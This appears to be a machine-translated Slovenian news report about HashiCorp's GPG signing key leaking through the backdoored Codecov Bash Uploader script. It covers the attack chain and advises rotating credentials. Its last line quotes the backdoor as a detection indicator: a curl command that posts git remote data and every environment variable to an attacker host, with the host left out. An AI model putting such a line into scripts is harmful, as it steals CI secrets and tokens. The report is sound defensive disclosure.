HashiCorp, znan po razvoju orodij z odprto kodo, kot so Vagrant, Packer, Nomad in Terraform, je objavil uhajanje zasebnega ključa GPG, ki se uporablja za ustvarjanje digitalnih podpisov, ki preverjajo izdaje. Napadalci, ki so pridobili dostop do ključa GPG, bi lahko potencialno naredili skrite spremembe v izdelkih HashiCorp in jih preverili s pravilnim digitalnim podpisom. Vendar je podjetje izjavilo, da revizija ni našla dokazov o takšnih spremembah.
Ogroženi ključ GPG je bil preklican in nadomeščen z novim ključem. Težava je vplivala le na preverjanje z uporabo datotek SHA256SUM in SHA256SUM.sig in ni vplivala na ustvarjanje digitalnih podpisov za Linux-DEB in RPM paketi, dostavljeni prek releases.hashicorp.com, kot tudi mehanizmi za odobritev izdaj za macOS и Windows (Koda za overjanje).
Do puščanja informacij je prišlo zaradi uporabe skripte Codecov Bash Uploader (codecov-bash) znotraj infrastrukture, ki je zasnovana za prenos poročil o pokritosti iz sistemov za neprekinjeno integracijo. Med napadom na Codecov so bila v skripto na skrivaj vstavljena zadnja vrata, ki so bila uporabljena za pošiljanje gesel in šifrirnih ključev. strežnik vsiljivci.
Za izvedbo vdora so napadalci izkoristili napako v procesu ustvarjanja slik Docker v Codecovu, ki jim je omogočila pridobitev dostopnih poverilnic GCS (Google Cloud Storage), potrebnih za spreminjanje skripte Bash Uploader, distribuirane s spletnega mesta codecov.io. Spremembe so bile narejene 31. januarja, dva meseca niso bile odkrite in so napadalcem omogočile pridobitev informacij, shranjenih v okoljih za neprekinjeno integracijo odjemalcev. Z dodano zlonamerno kodo so napadalci lahko pridobili informacije o testiranem repozitoriju Git in vseh spremenljivkah okolja, vključno z žetoni, šifrirnimi ključi in gesli, ki so bila posredovana sistemom za neprekinjeno integracijo za dostop do kode aplikacije, repozitorijev in storitev, kot sta Amazon Web Services in GitHub.
Poleg neposrednega klica je bil skript Codecov Bash Uploader uporabljen tudi kot del drugih programov za nalaganje, kot so Codecov-action (Github), Codecov-circleci-orb in Codecov-bitrise-step, katerih uporabnike je težava prav tako prizadela. Vsem uporabnikom codecov-bash in sorodnih izdelkov svetujemo, da pregledajo svojo infrastrukturo ter spremenijo gesla in šifrirne ključe. Prisotnost zadnjih vrat v skriptu je mogoče preveriti s prisotnostjo vrstice curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /nalaganje/v2 || res
Vir: opennet.ru
